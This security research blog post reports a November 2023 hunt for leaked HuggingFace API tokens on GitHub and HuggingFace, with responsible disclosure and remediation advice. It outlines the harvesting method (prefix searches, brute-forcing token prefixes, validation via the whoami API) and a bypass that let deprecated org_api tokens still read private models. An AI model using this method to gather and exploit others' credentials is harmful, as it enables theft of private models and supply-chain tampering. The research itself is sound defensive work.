Understanding HugginingFace and GitHub are critical platforms for the developer community, we have decided to gain better knowledge and a deeper look into the registry. In this research, we have discovered thousands of API Tokens that were exposed to malicious actors leaving millions of end users vulnerable.
A large language model (LLM) is a type of artificial intelligence (AI) algorithm that uses deep learning techniques and massively large data sources to understand, summarize, and generate new content. LLMs are a type of Generative AI that has been specifically architected to generate any type of content as an output (text, images, videos, etc.). This new groundbreaking technology took over the world.
The LLM technology in its nature is conversational, unstructured, and situational, making it very easy to use for everyone. Today LLM technology is a non-negotiable asset for businesses striving to maintain a competitive advantage. Recognizing its productivity and efficiency-boosting potential, organizations are deploying AI tools that incorporate LLM and Generative AI (GenAI) technology in their operations.
Alongside the swift adoption of LLMs and Generative AI, Hugging Face has become the go-to resource for developers working on these kinds of LLM projects. One of the key offerings from HuggingFace is the Transformers library, which is an open-source library. The HuggingFace registry hosts more than 500,000 AI models and 250,000 datasets, with some of its most notable offerings being the Meta-Llama, Bloom, Pythia, and more pre-trained models that have revolutionized how machines understand and interact with human language.
One highlight of the platform is the HuggingFace API ability with their Python library, which allows developers and organizations to integrate models, read, create, modify, and delete repositories or files within them. These HuggingFace API tokens are highly significant for organizations and exploiting them could lead to major negative outcomes such as data breaches, malicious models spreading, and more.
Understanding HugginingFace is a critical platform for the developer community, we have decided to gain better knowledge and a deeper look into the registry. During the month of November 2023, we conducted a research and investigated Huggineface’s security method and tried to find exposed API tokens, which could lead to the exploitation of three of the new OWASP Top 10 for Large Language Models (LLMs) emerging risks:
1) Supply Chain Vulnerabilities - The LLM application lifecycle can be compromised by vulnerable components or services, leading to security attacks. Using third-party datasets, pre-trained models, and plugins can add vulnerabilities.
2) Training Data Poisoning - This occurs when LLM training data is tampered with, introducing vulnerabilities or biases that compromise security, effectiveness, or ethical behavior. Sources include Common Crawl, WebText, OpenWebText, & books.
3) Model Theft - This involves unauthorized access, copying, or exfiltration of proprietary LLM models. The impact includes economic losses, compromised competitive advantage, and potential access to sensitive information.
Focused on uncovering exposed tokens, our research aimed to assess the extent of potential risks and weaknesses. By scrutinizing HuggingFace and Github, our goal was to provide actionable insights to strengthen security measures and protect against potential threats, ensuring the robustness of the platform's infrastructure, as well as to organizations looking to safeguard their LLM investment.
At the beginning of the research to find API tokens we scanned GitHub and HuggingFace repositories using their search functionality. In the GitHub search, we used the option to search code by regex, but we encountered a problem: the results of this kind of search returned only the first 100 results. Therefore we searched for the HuggingFace tokens regex (both users and org_api tokens), by doing so we were able to receive thousands of results but could read only 100 of them. To overcome this obstacle, we had to make our token prefix longer, so we have brute forced the first two letters of the token to receive fewer responses per request and therefore receive access to all of the available results.
In HuggingFace the behavior was even harder to scan. Regex was not welcomed, but we were able to search for a substring to get all of it.
But that's not all, when we searched for an example substring: "hf_aa", we received a text that did not contain all the substrings but text that starts with hf_axxxxx or hf_xaxxxxx. (weird right?!)
After adjusting and rescanning, all of the tokens were successfully found on both of these platforms. Now we needed to check which token is valid, so in this next step, we used the ‘whoami’ HuggingFace API. Out of this API call we received data on the following:
We then mapped all users and their permissions, and listed all the models and datasets they have access to (private and public).
In this groundbreaking research, our team has unearthed a staggering number of 1681 valid tokens laid bare through HuggingFace and GitHub, ushering us into unprecedented discoveries.
This massive effort enabled us to gain access to 723 organizations' accounts, with some of the most high-valued organizations, including giants like Meta, HuggingFace, Microsoft, Google, VMware, and more. Intriguingly, among these accounts, 655 users’ tokens were found to have write permissions, 77 of them to various organizations, granting us full control over the repositories of several prominent companies. Notably, some of the organizations with such extensive access included EleutherAI(Pythia), and BigScience Workshop(Bloom), highlighting the extent of our research's impact and its potential implications in the realm of supply chain attacks and organizational data integrity.
Notably, our investigation led to the revelation of a significant breach in the supply chain infrastructure, exposing high-profile accounts. The ramifications of this breach are far-reaching, as we successfully attained full access, both read and write permissions, to Meta Llama2, BigScience Workshop, and EleutherAI, all of these organizations own models with Millions of downloads - an outcome that leaves the organization susceptible to potential exploitation by malicious actors.
The gravity of the situation cannot be overstated. With control over an organization boasting millions of downloads, we now possess the capability to manipulate existing models, potentially turning them into malicious entities. This implies a dire threat, as the injection of corrupted models could affect millions of users who rely on these foundational models for their applications.
The example below shows the creation of a new model repository in the meta-llama organization:
The implications extend beyond mere model manipulation. Our research also granted us write access to 14 datasets with tens and hundreds of thousands of downloads a month. Alarming as it is, this opens the door to a malicious technique known as Training Data Poisoning. By tampering with these trusted datasets, attackers could compromise the integrity of machine learning models, leading to widespread consequences.
When we took a closer look into OWASP’s Model Theft vulnerability compared to our finding, we were able to “steal” over ten thousand private models. Furthermore, these models were associated with over 2500 datasets. However, while Model Theft has its own topic in the new OWASP Top 10 for LLM, no one talks about stealing o datasets. Therefore we believe the expert community should consider changing the title of the vulnerability scenario from “Model Theft” to "AI Resource Theft (Models & Datasets).
An additional finding we came across while researching these vulnerabilities was that HuggingFace has announced the org_api tokens were deprecated, and even in their Python library they blocked the use of it by checking the type of the token in the login function.
Therefore we decided to investigate it, and indeed the write functionality didn’t work, but apparently, even with small changes made for the login function in the library, the read functionality still worked, and we could use tokens that we found to download private models with exposed org_api token (e.g. Microsoft).
Following our discoveries we have reached out and informed all users and organizations, and requested a response to mitigate the breaches, as we are committed to user security and the safety of the models, and also recommended they revoke their exposed tokens and delete the tokens from their repositories. We also informed HuggingFace about the vulnerability we found, and following that it was successfully fixed, and org_api tokens were no longer usable for reading. Many of the organizations (Meta, Google, Microsoft, VMware, and more) and users took very fast and responsible actions, they revoked the tokens and removed the public access token code on the same day of the report.
Organizations and developers should understand HuggingFace and other likewise platforms aren't taking active actions for securing their users exposed tokens.
To fellow developers, we advise you to avoid working with hard-coded tokens, and follow best practices. Doing so will help you avoid verifying every commit that no tokens or sensitive information is pushed to the repositories.
We also recommend HuggingFace to constantly scan for publicly exposed API tokens and revoke them, or notify the users and organizations about the exposed tokens. A similar method has been implemented by GitHub which revokes OAuth token, GitHub App token, or personal access token, when it is pushed to public repository or public gist.
In a rapidly evolving digital landscape, there’s a major significance of early detection in preventing potential harm in securing LLMs demands. To address challenges such as exposed API Tokens, Training Data Poisoning, Vulnerabilities in the Supply Chain, and Model and Dataset Theft, we recommend applying token classification, as well as implementing a security solution to inspect IDEs and Code Review specifically designed to safeguard these transformative models.
By promptly addressing these issues, organizations can fortify their defenses and prevent the impending threats posed by these security vulnerabilities. The landscape of digital security demands vigilance, and our research serves as a crucial call to action in securing the foundations of the LLMs realm.